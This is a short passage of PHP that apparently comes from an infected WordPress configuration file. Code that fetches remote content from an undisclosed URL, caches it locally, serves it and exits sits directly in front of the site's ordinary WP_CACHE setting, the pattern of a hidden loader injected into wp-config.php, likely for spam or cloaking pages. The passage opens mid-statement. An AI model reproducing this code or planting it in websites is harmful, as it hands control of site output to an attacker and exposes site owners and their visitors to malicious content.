$randomtime)||(filesize($filecache)==0)) { $tmpx=curl_gets($urlx); if ($tmpx!=404){$file = fopen ($filecache,"w+");if ( $file ) {fputs ( $file, $tmpx);}} else { $file = fopen ($filecache,"a+");if ( $file ) {fputs ( $file, ''); } if ($urlredict) {exit("");} } @fclose ($file); } readfile($filecache); ///////////// exit; } ?>define('WP_CACHE', true); //Added by WP-Cache Manager